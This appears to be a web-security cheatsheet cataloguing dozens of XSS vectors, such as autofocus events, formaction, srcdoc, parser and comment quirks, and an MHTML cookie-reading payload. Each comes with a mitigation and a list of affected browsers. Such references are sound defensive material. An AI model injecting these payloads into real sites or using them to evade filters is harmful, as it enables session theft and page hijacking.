Vectors making use of HTML5 features
XSS via formaction - requiring user interaction (1)#1test
A vector displaying the HTML5 form and formaction capabilities for form hijacking outside the actual form.
<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
Don't allow users to submit markup containing "form" and "formaction" attributes or transform them to bogus attributes. Avoid "id" attributes for forms as well as submit buttons.
- Firefox 4.0
- Firefox Latest
- Opera 10.5
- Opera Latest
- Chrome 10.0
- Chrome Latest
- Safari 4.0.4
- Safari Latest
- Internet Explorer 10
- Internet Explorer Latest (Inside Form Element)
Self-executing focus event via autofocus#7test
This vector uses an input element with autofocus to call its own focus event handler - no user interaction required
<input onfocus=write(1) autofocus>
User submitted markup should not contain "autofocus" attributes.
- Firefox 4.0
- Firefox Latest
- Opera 9.0
- Opera Latest
- Safari 4.0
- Safari Latest
- Chrome 4.0
- Chrome Latest
- Internet Explorer 10.0
- Internet Explorer Latest
Self-executing blur event via autofocus competition#8test
Here we have two HTML input elements competing for the focus - and one executing JavaScript on losing its focus
<input onblur=write(1) autofocus><input autofocus>
User submitted markup should not contain "autofocus" attributes.
- Safari 4.0
- Safari Latest
- Chrome 4.0
- Chrome Latest
JavaScript execution via <VIDEO> poster attribute#10test
Opera 10.5+ allows using poster attributes in combination with javascript: URIs. This bug has been fixed in Opera 11.
<video poster=javascript:alert(1)//></video>
Make sure only relative URIs, http URIs and correctly MIME-typed data URIs can be used for VIDEO poster attributes
- Opera 10.5
- Opera 11.01
Self-executing JavaScript via <BODY> onscroll autofocus#12test
This vector triggers an onscroll event executing JavaScript on <BODY> due to an autofocus on an <INPUT> way further down the page.
<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
- Firefox 4.0
- Firefox Latest
- Opera 9.0
- Opera Latest
- Safari 4.0
- Safari Latest
- Chrome 4.0
- Chrome Latest
Form surveillance with onformchange, onforminput and form attributes#23test
Enter a value into the form element to see how "onforminput" and "onformchange" attributes can monitor <FORM> activity - even from outside the <FORM> via the form attribute on a <BUTTON> element.
<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>
Make sure users cannot submit markup including the form, "onformchange" and "onforminput" attributes. Do not apply <FORM> elements with an "id" attribute.
- Opera 10.5
- Opera 12.0
JavaScript execution via <VIDEO> and <SOURCE> tag (1)#55test
Opera 10.5+ and Chrome allow error handlers in <SOURCE> tags if encapsulated by a <VIDEO> tag. The same works for <AUDIO> tags
<video><source onerror="alert(1)">
Make sure user submitted <SOURCE> tags cannot contain event handlers or whitelist event handlers necessary for UI controls.
- Opera 10.5
- Opera Latest
- Chrome 4.0
- Chrome Latest
- Firefox 4.0
- Firefox Latest
JavaScript execution via <VIDEO> and <SOURCE> tag (2)#56test
Firefox 3.5+ allows error handlers in <VIDEO> tags when applied with a <SOURCE> tag. The same works for <AUDIO> tags. On Firefox 4+ the <SOURCE> tag is irrelevant to trigger the error event. This happens because of the implicit "src" attribute in <VIDEO> tag when the page has a number sign (#) in the URL.
<video onerror="alert(1)"><source></source></video>
Make sure user submitted <AUDIO> and <VIDEO> tags cannot contain event handlers or whitelist event handlers necessary for UI controls.
- Firefox 3.5
- Firefox Latest
- Internet Explorer 9.0
- Internet Explorer Latest
XSS via formaction - requiring user interaction (2)#72test
A vector displaying the HTML5 "formaction" capabilities for form hijacking. Note that this variation does not use the "id" and "form" attributes to connect button and form.
<form><button formaction="javascript:alert(1)">X</button>
Don't allow users to submit markup containing "form" and "formaction" attributes or transform them to bogus attributes.
- Firefox 4.0
- Firefox Latest
- Opera 10.5
- Opera Latest
- Chrome 10.0
- Chrome Latest
- Safari 4.0.4
- Safari Latest
- Internet Explorer 10.0
- Internet Explorer Latest
Passive JavaScript execution via <BODY> and oninput attribute#86test
All browsers besides Internet Explorer 9↓ support the "oninput" event handler around form elements like the given <INPUT>. The event works for the form elements itself, the surrounding form and <BODY> as well as <HTML> tags.
<body oninput=alert(1)><input autofocus>
Do not whitelist "oninput" attributes in user submitted markup.
- Firefox 3.6
- Firefox Latest
- Safari 4.0
- Safari Latest
- Chrome 4.0
- Chrome Latest
- Opera 9.0
- Opera Latest
- Internet Explorer 10.0
- Internet Explorer Latest
Passive JavaScript execution via MathML on Firefox#130test
Modern Firefox versions allow usage of inline MathML. While other user agents don't support the href attribute for MathML elements (yet), Firefox does and thereby enables passive JavaScript execution. Note that supporting href for MathML elements is a feature - introduced with MathML 3. The same effect can be observed by using xlink:href. The statusline action further enables obfuscation of the actual link target - and in this example hides the JavaScript URI.
<math href="javascript:alert(1)">CLICKME</math> <math> <!-- up to FF 13 --> <maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction> <!-- FF 14+ --> <maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction> </math>
Do not allow users to submit unfiltered MathML content.
- Firefox 6
- Firefox Latest
Transparent overwriting of request-data using HTML5 "dirname" attributes#136test
Opera and Chrome support the HTML5 attribute "dirname", that can be used to have the browser communicate the text-flow direction of another input element by adding it to the server-sent request body. By injecting a "dirname" attribute in an existing form, an attacker can overwrite user input and thereby make it guessable for malicious purposes. The overwritten value would then be "ltr" or "rtl" - depending on the actual text-flow direction. The "dirname" attribute is not yet supported by Internet Explorer or Firefox.
<form action="" method="post"> <input name="username" value="admin" /> <input name="password" type="password" value="secret" /> <input name="injected" value="injected" dirname="password" /> <input type="submit"> </form>
Avoid white-listing the "dirname" attribute in user generated content. The effects on existing forms are hard to predict and might cause privacy problems and information leaks.
- Opera 12.0
- Chrome 22.0
- Chrome Latest
Executing JavaScript via cross-origin HTML imports#138test
Google Chrome Canary already supports HTML Imports. They allow to fetch resources from arbitrary origins (as long as the Access-Control-Origin headers are set properly) and inject it into the requesting DOM. Currently, only Chrome supports the feature and it's still hidden behind a flag. It is however to be expected to be supported by all major browsers.
<link rel="import" href="test.svg" />
Make sure that HTML imports are limited to the same origin. Avoid permitting users to have <link> tags in user-generated rich-text as they can now directly execute JavaScript without any user interaction.
- Chrome 33.0
- Chrome Latest
- Opera Latest
Executing JavaScript via "srcdoc" attribute in Iframes#139test
HTML5 specifies a "srcdoc" attribute for Iframes. This attribute, quite similar to data URIs, is capable of hosting HTML text to be rendered by the browser as the content of the Iframe. The pseudo-document created by the "srcdoc" attribute has full access to the hosting domain, although it runs in an artificial origin. This attribute should if at all only be used in combination with the Iframe Sandbox.
<iframe srcdoc="<img src=x:x onerror=alert(1)>" />
Make sure to use "srcdoc" only in combination with the Iframe Sandbox. Otherwise, XSS attacks might slip through existing filters' rules as the payload can be HTML encoded.
- Firefox 26.0
- Firefox Latest
- Chrome 20.0
- Chrome Latest
- Opera 15.0
- Opera Latest
HTML5 <picture> element and "srcset" attributes#142test
HTML5 offers the <picture> element for responsive and accessible images. The <picture> element essentially wraps <source> and <img> elements and provides a way to offer alternative content. Novel here is that the "srcset" attribute allows to trigger load events. This is likely to bypass existing WAF systems.
<picture><source srcset="x"><img onerror="alert(1)"></picture> <picture><img srcset="x" onerror="alert(1)"></picture> <img srcset=",,,,,x" onerror="alert(1)">
In case a black-list based XSS filter is in use, make sure that the combination of event handler and "srcset" attribute is detected by it as well.
- Chrome 38.0
- Chrome Latest
- Internet Explorer Spartan
Bypassing window.opener protection of rel="noreferrer"#143test
In many situations, a developer might want to mitigate tab-nabbing attacks that are using window.opener and its writable location object. To do so, it is recommended to apply external links with a rel="noreferrer" attribute. Depending on how the external links are embedded, the protection might however fail - and window.opener might not be null but still be exposed. The problem here is, that rel attributes only work for <a> and <area>. Links and link-like navigation features can however be embedded in multiple other ways. Further note, that MSIE pretty much ignores the standard and doesn't destroy window.opener without further effort.
<a href="//evil.com" target="_blank" rel="noreferrer">CLICK</a> // window.opener will be null <map><area href="//evil.com" target="_blank" rel="noreferrer">CLICK</area></map> // window.opener will be null <svg><a xlink:href="//evil.com" rel="noreferrer">CLICK</a></svg> // window.opener still works <form action="//evil.com" target="_blank" rel="noreferrer"><input type="submit"></form>// window.opener still works <form id="test" rel="noreferrer"></form><button form="test" formtarget="_blank" formaction="//evil.com">CLICKME</button>// window.opener still works <math href="//evil.com" xlink:show="new" rel="noreferrer">CLICKME</math>// window.opener still works
Do not rely on the noreferrer attribute value alone, but rather use a dedicated de-referrer page that in additon deactivates window.opener using window.opener.__proto__=null.
- Chrome 4.0
- Chrome Latest
- Opera 9.0
- Opera Latest
- Internet Explorer 6.0
- Internet Explorer Latest
- Firefox 1.X
- Firefox Latest
- Safari 4.0
- Safari Latest
Generating greater-than with HTML5 Named Character References#144test
Some of the HTML5 Named Character references generate two ASCII characters, such as <⃒ and >⃒. This can in some exotic scenarios be abused to generate valid HTML without actually closing a tag with an ASCII greater-than. The entity will produce the greater-than so we do not have to.
<iframe srcdoc="<svg onload=alert(1)>⃒"></iframe> <a href="javascript:'<svg onload=alert(1)>⃒'">CLICK</a>
Be very careful when HTML attributes are used to carry HTML data that is later being used on the website. When entities are accepted, some HTML entities can produce dangerous characters even if they don't look like it on first sight.
- Chrome 4.0
- Chrome Latest
- Opera 12.0
- Opera Latest
- Internet Explorer 9.0
- Internet Explorer Latest
- Firefox 4.X
- Firefox Latest
- Safari 4.0
- Safari Latest
XSS without User Interaction from passive Elements#145test
Often, an attacker can only inject into a "passive" element, meaning for instance a DIV or a SPAN. For those elements, it's not always trivial to execute injected JavaScript without user interaction (such as clicks or mouse events). If the element injected into is outside the visible range, it becomes hard to prove that the injection is in fact exploitable. For this reason, this item lists all currently known ways of executing JavaScript without user interaction from passive elements. The list is expected to grow over time. Note, that for some of the attacks here, the string "#xss" needs to be appended to the URL of the injected page.
#Chrome, Opera, Safari and Edge <div onfocus="alert(1)" contenteditable tabindex="0" id="xss"></div> <div style="-webkit-user-modify:read-write" onfocus="alert(1)" id="xss"> <div style="-webkit-user-modify:read-write-plaintext-only" onfocus="alert(1)" id="xss"> # Firefox <div onbeforescriptexecute="alert(1)"></div> <script>1</script> #MSIE10/11 & Edge <div style="-ms-scroll-limit:1px;overflow:scroll;width:1px" onscroll="alert(1)"> #MSIE10 <div contenteditable onresize="alert(1)"></div> # MSIE11 <div onactivate="alert(1)" id="xss" style="overflow:scroll"></div> <div onfocus="alert(1)" id="xss" style="display:table"> <div id="xss" style="-ms-block-progression:bt" onfocus="alert(1)"> <div id="xss" style="-ms-layout-flow:vertical-ideographic" onfocus="alert(1)"> <div id="xss" style="float:left" onfocus="alert(1)"> # Chrome, Opera, Safari <style>@keyframes x{}</style> <div style="animation-name:x" onanimationstart="alert(1)"></div> # Chrome, Opera, Safari <style> div {width: 100px;} div:target {width: 200px;} </style> <div id="xss" onwebkittransitionend="alert(1)" style="-webkit-transition: width .1s;"></div> # Safari <div style="overflow:-webkit-marquee" onscroll="alert(1)"></div>
Most modern browsers provide ways to execute JavaScript from passive elements by combining several aspects an attacker can control. Seemingly passive XSS should thus be treated with similar severity than active XSS.
- Chrome 4.0
- Chrome Latest
- Opera 12.0
- Opera Latest
- Internet Explorer 9.0
- Internet Explorer Latest
- Firefox 4.X
- Firefox Latest
- Safari 4.0
- Safari Latest
JavaScript execution via <DETAILS> and ontoggle#147test
The <DETAILS> element fires an "ontoggle" event without user interaction on modern Blink-based browsers. This can be abused to bypass blacklists as the event-tag combination is not very well known.
<details open ontoggle="alert(1)">
Be sure to work with whitelists when allowing users to submit markup - else experimental tags like <DETAILS> might be forgotten to filter and escape.
- Chrome 24.0
- Chrome Latest
- Opera 16.0
- Opera Latest
JavaScript execution via <VIDEO> with empty source and rate change events#148test
The <VIDEO> element fires an "onratechange" event without user interaction on Firefox, even if no actual value for the "src" attribute is given. This can be used to bypass WAF and IDS systems as this combination of tag and attributes is rather uncommon and unknown.
<video src onratechange="alert(1)">
Be sure to work with whitelists when allowing users to submit markup - else tags like <VIDEO> might be forgotten to filter and escape.
- Firefox 15.0
- Firefox Latest
Vectors working on HTML4 and older versions
JavaScript execution via <FRAMESET> and onload#31test
This classic vector shows that several tags don't need a "src" attribute to fire onload events, such as <IFRAME>, <BODY> and <FRAMESET>.
<frameset onload=alert(1)>
Be sure to work with whitelists when allowing users to submit markup - else ancient tags like <FRAMESET> might be forgotten to filter and escape.
- Internet Explorer 5.0
- Internet Explorer Latest
- Opera 8.X
- Opera Latest
- Firefox 1.X
- Firefox Latest
- Chrome 3.0
- Chrome Latest
- Safari 3.0
- Safari Latest
JavaScript execution via <TABLE> and background#32test
Opera 8-10.5+ as well as Internet Explorer 6 support JavaScript URIs for <TABLE> and some other tags' "background" attributes. This causes JavaScript execution without user interaction. The problem has been fixed in Opera 11.
<table background="javascript:alert(1)"></table>
In case evil attributes like event handlers are being filtered from user submitted markup make sure not to forget "background" - among others.
- Internet Explorer 6.0
- Opera 8.X
- Opera 11.01
HTML comment parsing issues (1)#37test
This vector shows how comments are being parsed and what problems can arise in case user submitted HTML is allowed to contain comments.
<!--<img src="--><img src=x onerror=alert(1)//">
Make sure comments are not allowed in user submitted html. The markup should be checked for security issues after comments have been stripped out - not before.
- Internet Explorer 5.0
- Internet Explorer Latest
- Opera 8.0
- Opera Latest
- Firefox 1.0
- Firefox Latest
- Chrome 3.0
- Chrome Latest
- Safari 3.0
- Safari Latest
HTML comment parsing issues (2)#38test
Besides <!---> the Internet Explorer allows to use <COMMENT> tags. The vector shows how comments are being parsed and what problems can arise in case user submitted HTML is allowed to contain comments. This example works up to IE 8 standards mode.
<comment><img src="</comment><img src=x onerror=alert(1)//">
Make sure <COMMENT> tags are not allowed in user submitted html. The markup should be checked for security issues after <COMMENT> tags have been stripped out or escaped - not before.
- Internet Explorer 5.0
- Internet Explorer Latest (In Older Docmode)
CDATA section parsing issues#39test
Firefox and Opera allow using CDATA section delimiters in HTML - in the stripped form "<![" as well as including padding like "<![CDATA[". This can cause problems for filter mechanisms since those delimiters can be used for massive obfuscation. Firefox 4 and Opera 11.60 have fixed the issue. However, modern browsers have a separate XML parsers for inline SVG or MathML, which allow to use the CDATA sections (including a little irregular shape).
<!-- up to Opera 11.52, FF 3.6.28 --> <![><img src="]><img src=x onerror=alert(1)//"> <!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ --> <svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>
Make sure CDATA delimiters are not allowed in user submitted html. The markup should be checked for security issues after CDATA sections nd delimiters have been stripped out or escaped - not before.
- Opera 8.0
- Opera Latest
- Firefox 1.X
- Firefox Latest
- Internet Explorer 9.0
- Internet Explorer Latest
- Chrome 7.0
- Chrome Latest
- Safari 4.0.4
- Safari Latest
Plaintext tags used for markup obfuscation#40test
This vector works on all tested user agents and shows how several filtering solutions can be tricked into accepting malicious HTML. A badly written filter will assume the error handler is part of the first image's "src" attribute and accept the incoming data.
<style><img src="</style><img src=x onerror=alert(1)//">
Don't rely on weak regular express for markup filtering. Use whitelists for allowed tags and rely on a filter solution based on a heavily tested tokenizer/parser.
- Internet Explorer 5.0
- Internet Explorer Latest
- Opera 8.X
- Opera Latest
- Firefox 1.X
- Firefox Latest
- Chrome 3.0
- Chrome Latest
- Safari 3.0
- Safari Latest
Error handler via empty list-style and load handler via empty content#41test
Opera 10.5+ and earlier versions fire an error event for <LI> tags in case the background URL via style attribute cannot be loaded. The same works with "list-style-image" too. On Opera 10.10 and earlier more tag/style combinations like background:url() and background-image:url() work as well. Also works combination like content:url(svg), but at the moment it is sensitive to events and <script> tags before and after.
<li style=list-style:url() onerror=alert(1)></li> <div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>
- Opera 8.0
- Opera 12.0
Link hijacking via <BASE> and JavaScript URI#42test
<BASE> link hijacking with JavaScript URIs works on Internet Explorer, Opera (O8-10.5 in case the link URL starts with #) and Safari. User interaction is required to execute the JavaScript. The vector sometimes has to be changed slightly to work for all mentioned user agents. Opera 11 ships a more or less working fix, but this problem continues to exist in difficult to exploit forms though.
<head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>
User submitted HTML should not allow usage of <BASE> tags. In case they are necessary no non-HTTP/non-relative URL schemes should be allowed.
- Opera 8.X
- Opera 10.63
- Safari 3.0
- Safari 5.1.7
- Internet Explorer 5.5
- Internet Explorer 8.0
JavaScript execution via <SCRIPT> for and event attributes#48test
Internet Explorer allow using <SCRIPT> tags with "for" and "event" attributes to bind event data to specific html elements. The two shown attribute values cause script execution without user interaction. Opera simply ignores these attributes.
<SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>
- Opera 10.0
- Opera 12.0
- Internet Explorer 6.0
- Internet Explorer Latest (In Older Docmodes)
JavaScript execution via <OBJECT> DataURL attribute#49test
Internet Explorer 9 and - in some situations - earlier versions support the use of JavaScript URIs for the "dataurl" attribute of a TDC Object. The JavaScript will be executed without user any interaction.
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
- Internet Explorer 6.0
- Internet Explorer 9.0
JavaScript execution via <OBJECT> data#50test
Almost all browsers supporting data URIs allow executing JavaScript via crafted <OBJECT> "data" attribute value - even if base64 encoded. Note however, that different browsers execute the JavaScript on different origins. Firefox for instance will execute on the hosting domain and thus allow XSS, while Chrome will execute on about:blank.
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
Make sure user submitted HTML cannot contain <OBJECT> tags or only whitelisted <OBJECT> "data" values.
- Opera 8.X
- Opera Latest
- Firefox 1.X
- Firefox Latest
- Chrome 3.0
- Chrome Latest
- Safari 4.0
- Safari Latest
JavaScript execution via <EMBED> src#51test
Almost all browsers supporting data URIs allow executing JavaScript via crafted <EMBED> "src" attribute value - even if base64 dencoded. Only Firefox attempts to search for a plugin handler and fails.
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed> <embed src="javascript:alert(1)"></embed> // Firefox only
Make sure user submitted HTML cannot contain <EMBED> tags or only whitelisted <EMBED> "src" values.
- Opera 8.X
- Opera Latest
- Chrome 3.0
- Chrome Latest
- Safari 4.0
- Safari Latest
- Firefox 12.0
- Firefox Latest
Tags nested in other tags to trick filters#57test
Chrome, Firefox and Safari will execute JavaScript with this example nesting - while Opera and IE wouldn't.
<b <script>alert(1)//</script>0</script></b>
This vector is ideal to trick regular expression based HTML filters and sanitizers. Make sure your filters are aware of the fact that some user agents evaluate <b <script> while others will prefer <b><script>.
- Firefox 3.5
- Firefox 3.6.28
- Chrome 4.0
- Chrome 5.0
- Safari 3.0
- Safari 4.0.3
XSS using accent grave when copying innerHTML (1)#59test
Internet Explorer treats the accent grave (`) as an attribute delimiter like " and '. The quotation mark (") will be stripped from the attribute value when using the innerHTML property in case it doesn't contain space.
<div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
Make sure the HTML filter you use is aware of the fact that the accent grave is a valid attribute delimiter for IE too - especially if users are allowed to post harmless JavaScript (JSReg, Google Caja). Be very careful when handling user generated HTMl in the DOM later on. The innerHTML property does not always contain what it's supposed to.
- Internet Explorer 6.0
- Internet Explorer 8.0 (Unpatched)
Simulating attributes in IE#62test
This vector simulates an attribute in IE by using a single quote to trick filters. This works up to IE9 in standards mode and in latest IE using older document modes.
<!-- IE 6-8 --> <x '="foo"><x foo='><img src=x onerror=alert(1)//'> <!-- IE 6-9 --> <! '="foo"><x foo='><img src=x onerror=alert(2)//'> <? '="foo"><x foo='><img src=x onerror=alert(3)//'>
- Internet Explorer 6.0
- Internet Explorer Latest (In Older Docmodes)
JavaScript execution via src attribute#63test
Most browsers allow executing JavaScript via <IFRAME> "src" attributes - this is expected behavior. Interesting is though that this can be extended to other tags too. Opera 10, Chrome and Firefox execute JavaScript by using the <EMBED> tag while Opera 10 and Opera Mobile even execute JavaScript with <SCRIPT>, <IMG> and <IMAGE> and a matching "src" attribute as well as early Internet Explorer versions.
<embed src="javascript:alert(1)"></embed> // O10.10↓, OM10.0↓, GC6↓, FF <img src="javascript:alert(2)"> <image src="javascript:alert(2)"> // IE6, O10.10↓, OM10.0↓ <script src="javascript:alert(3)"></script> // IE6, O11.01↓, OM10.1↓
Make sure "src" attributes can never contain non-HTTP-URLs to prevent XSS or worse.
- Firefox 3.0
- Firefox Latest
- Chrome 4.0
- Chrome 6.0
- Opera 8.X
- Opera 11.01
- Internet Explorer 6.0
JavaScript execution via IE filters and onfilterchange#70test
In some situations it's possible to trigger a filterchange event by using just one filter as the example shows. Also the short filter notation is being used which is supported by all IE versions despite the information in the documentation. In compatibility mode to IE8+ you can use the property "-ms-filter".
<div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>
- Internet Explorer 6.0
- Internet Explorer 9.0
<OBJECT> tag and Flash files executing JavaScript#79test
<OBJECT> tags directly including Flash files via the "data" attribute - allowing execution of JavaScript and more without user interaction.
<object allowscriptaccess="always" data="test.swf"></object>
Make sure users cannot control the "src" and "data" attribute values of <OBJECT> tags - or better don't whitelist <OBJECT> tags in user submitted markup at all.
class XSS {public static function main() { flash.Lib.getURL(new flash.net.URLRequest(flash.Lib._root.url||"javascript:alert(1)"),flash.Lib._root.name||"_top"); }}crossdomain: 1path: http://html5sec.org/test.swfname: test.swf
- Safari 3.0
- Safari Latest
- Firefox 1.5
- Firefox Latest
- Opera 10.0
- Opera 12.0
- Internet Explorer 6.0
- Internet Explorer Latest
Special tags parsing issues#91test
The HTML tagnames start with a-zA-Z (abstracting from ignoring null byte from IE). In addition, there are other structures, parsed as a tag (special tags). They begin with the following characters: !,?, /,%. This has its reasons: DTD, comments, xml-declaration, import-instruction in Internet Explorer, closing tags etc. starts by these characters. These examples show that such tags will inherit some properties of their standard models. [A] Firefox, Opera, Google Chrome, Safari (4.0.4↑), IE 10↑ Standards mode: Parameters of the special tags can not contain a closing parenthesis ">". [B] Safari (up to 4.0.3): Parameter of the special tags can be broken only via "?>". [C] Opera (up to 11.52): Special tag inherits the properties of DTD: inside it you can create a section that starts with "[" and ends with "]". [D] IE 9↓ Standards mode, Safari (up to 4.0.3): A sequence like "<% ... %>" is an alternative to comments. These features can be used for obfuscation and bypassing filters. And remember, do not parse as a tag in HTML structure like "<È foo=...>".
[A] <? foo="><script>alert(1)</script>"> <! foo="><script>alert(1)</script>"> </ foo="><script>alert(1)</script>"> [B] <? foo="><x foo='?><script>alert(1)</script>'>"> [C] <! foo="[[[x]]"><x foo="]foo><script>alert(1)</script>"> [D] <% foo><x foo="%><script>alert(1)</script>">
- Internet Explorer 5.0
- Internet Explorer Latest
- Opera 8.X
- Opera Latest
- Firefox 1.X
- Firefox Latest
- Chrome 3.0
- Chrome Latest
- Safari 3.0
- Safari Latest
JavaScript execution via MHTML-scheme#96test
This example used the ability to convert the file with any conent type into a web archive using mhtml URI scheme to run JavaScript. For the first time this feature was discovered by Stepanishchev E. in 2006 and became known among web developers as an alternative to data URI for IE6-7. In 2007, Hasegawa Y. independently proposed a way to use this mhtml feature for XSS. Followed fix was incomplete because it doesn't take into account the possibility of addressing to the contents of the archive using "!value". This possibility as well as the possibility to access from the archive contents to a host domain are used in the example below. Using this vector all sites that do not contain two new lines in the source code and allows users to insert new line were vulnerable - as well as all sites that allow users to upload images without post-upload conversion etc. A link to this web archives could be specified via <IFRAME> or location.href and comparable. This example was published in June 2010, fix released in April 2011. The mhtml URI scheme doesn't determine the content type now, but archive contents still has access to the host domain.
<iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe> <iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>
<html> <body> <b>some content without two new line \n\n</b> Content-Type: multipart/related; boundary="******"<b>some content without two new line</b> --****** Content-Location: xss.html Content-Transfer-Encoding: base64 PGlmcmFtZSBuYW1lPWxvIHN0eWxlPWRpc3BsYXk6bm9uZT48L2lmcmFtZT4NCjxzY3JpcHQ+DQp1 cmw9bG9jYXRpb24uaHJlZjtkb2N1bWVudC5nZXRFbGVtZW50c0J5TmFtZSgnbG8nKVswXS5zcmM9 dXJsLnN1YnN0cmluZyg2LHVybC5pbmRleE9mKCcvJywxNSkpO3NldFRpbWVvdXQoImFsZXJ0KGZy YW1lc1snbG8nXS5kb2N1bWVudC5jb29raWUpIiwyMDAwKTsNCjwvc2NyaXB0PiAgICAg --******-- </body> </html>crossdomain: 1path: http://html5sec.org/test.htmlname: test.html
- Internet Explorer 5.0
- Internet Explorer 10.0
XSS using "xmlns" attribute in custom tag when copying innerHTML (2)#97test
Internet Explorer incorrectly analyzes the attribute "xmlns" in custom tags when copying innerHTML - its value is being added to the tag <?XML:NAMESPACE> without any delimiters.
<!-- IE 5-9 --> <div id=d><x xmlns="><iframe onload=alert(1)"></div> <script>d.innerHTML+='';</script> <!-- IE 10 in IE5-9 Standards mode --> <div id=d><x xmlns='"><iframe onload=alert(2)//'></div> <script>d.innerHTML+='';</script>
Be very careful when handling user generated HTMl in the DOM later on. The innerHTML property does not always contain what it's supposed to.
- Internet Explorer 6.0
- Internet Explorer Latest (In Older Docmodes)
HTML separators and ignored characters#100test
[a] Characters accepted as tag name/attribute separators. Firefox, Internet Explorer, Safari, Google Chrome, Opera : 9,10,12,13,32,47 Internet Explorer (5-9 SM): 11 [b] Characters ignored before attributes (and not accepted as parameter/attribute separators). Firefox, Internet Explorer, Safari, Google Chrome, Opera : 47 Internet Explorer (5-9 SM): 0** [c] Characters ignored between attribute name and equals sign. Firefox, Internet Explorer, Safari, Google Chrome, Opera : 9,10,12,13,32 Internet Explorer (5-9 SM): 0,11 [d] Characters accepted as parameter/attribute separators. Firefox, Internet Explorer, Safari, Google Chrome, Opera : 9,10,12,13,32 Internet Explorer (5-9 SM): 11 [e] Characters ignored between equals sign and parameter. Firefox, Internet Explorer, Safari, Google Chrome, Opera : 9,10,12,13,32 Internet Explorer (5-9 SM): 0,11 * Characters are given as decimal ASCII table index. ** There is a common rule that the unencoded null character does not exist for IE HTML parser.
<img[a][b]src=x[d]onerror[c]=[e]"alert(1)">
- Internet Explorer 6.0
- Internet Explorer Latest (In Older Docmodes)
- Firefox 4.0
- Firefox Latest
- Opera 9.X
- Opera Latest
- Chrome 5.0
- Chrome Latest
- Safari 4.0
- Safari Latest
- http://shazzer.co.uk/vector/Characters-allowed-after-script
- http://shazzer.co.uk/vector/Attribute-separators
- http://shazzer.co.uk/vector/Characters-allowed-before-attribute-name
- http://shazzer.co.uk/vector/Characters-allowed-after-attribute-name
- http://shazzer.co.uk/vector/Quoteless-attributes-breaker
- http://docs.google.com/Doc?docid=0ASCeV1AnDNdWZGQ3eDVzbXdfMTZoZGQzNGdneg
- #106
Characters ignored in the URI scheme#101test
The following characters* are ignored in the URI sheme: [a] All mentioned browsers: 9,10,13,32 IE, GC, Safari, Opera: 11,12 IE, GC, Safari, FF 3.6.28↓: 8 IE, GC, Safari: 1-7,14-31 Opera: 160,5760,6158,8192-8202,8232,8233,8239,8287,12288 Opera 11.52↓: 6159 IE (5-9 SM): 0 [b],[c] IE, GC, Safari 4.0.3↓, FF 4-6, Opera 10.63↓: 9,10,13 GC 7↓, Safari 4.0.3↓: 1-8,11,12 IE (5-9 SM): 0 Safari 4.0.4↑, Opera 11↑, FF 7↑: nothing * Characters are given as decimal ASCII table index.
<a href="[a]java[b]script[c]:alert(1)">XXX</a>
- Internet Explorer 6.0
- Internet Explorer Latest
- Firefox 4.0
- Firefox Latest
- Opera 10.0
- Opera Latest
- Chrome 5.0
- Chrome Latest
- Safari 4.0
- Safari Latest
Forced plaintext via unbalanced quotes in Internet Explorer#102test
Internet Explorer treats any tag as plaintext in case the attribute delimiters are unbalanced - in this example caused by the ` `. In unbalanced quotes appear inside or outside an attributes - preceded by an arbitrary character but the equals sign - the usage of HTML inside attributes is possible and the content will be rendered as regular HTML. The problem has been reported and will be taken care of in later versions of the Internet Explorer.
<img src="x` `<script>alert(1)</script>"` `>
- Internet Explorer 6.0
- Internet Explorer 8.0 (Unpatched)
Safari attribute ofuscation with slashes and quotes#106test
Safari accepts slashes and quotes (if preceded by whitespace, slashes or other quotes) between attribute names and the equals character (name/"'=value). This enables interesting possibilities to obfuscate HTML strings, bypass filters and mimick attributes like in the given example.
<img src onerror /" '"= alt=alert(1)//">
- Safari 4.0
- Safari 4.0.3
JavaScript execution via <TITLE> tag on Inernet Explorer 9#107test
Internet Explorer 9 allows execution of JavaScript via onpropertychange event handler on <title> tags if another <title> tag follows up - having at least one valid attribute. This vector works in IE6-8 Standards mode and in IE9 quirks mode.
<title onpropertychange=alert(1)></title><title title=></title>
- Internet Explorer 6.0
- Internet Explorer Latest (In Older Docmodes)
Internet Explorer parameter parsing issue#108test
Internet Explorer treats the sequence of any quotes that follows the equal sign in a parameter without delimiters as the beginning of some semblance of new parameter.
<!-- IE 5-8 standards mode --> <a href=http://foo.bar/#x=`y></a><img alt="`><img src=xx:x onerror=alert(1)></a>"> <!-- IE 5-9 standards mode --> <!a foo=x=`y><img alt="`><img src=xx:x onerror=alert(2)//"> <?a foo=x=`y><img alt="`><img src=xx:x onerror=alert(3)//">
- Internet Explorer 6.0
- Internet Explorer Latest (In Older Docmodes)
Internet Explorer conditional comments - XSS via [if]> and <img> injection#115test
Conditional comments on Internet Explorer can cause trouble as soon as an attacker is able to inject rectangular brackets wrapping the words if and endif with almost arbitrary suffixes. A condition always being true will lead to immediate parsing of the enclosed markup on all tested Internet Explorer versions. The second example injects an <img> tag into the comment condition leading to immediate JavaScript execution as well. The examples are worked up to IE 9 standards mode.
<!--[if]><script>alert(1)</script --> <!--[if<img src=x onerror=alert(2)//]> -->
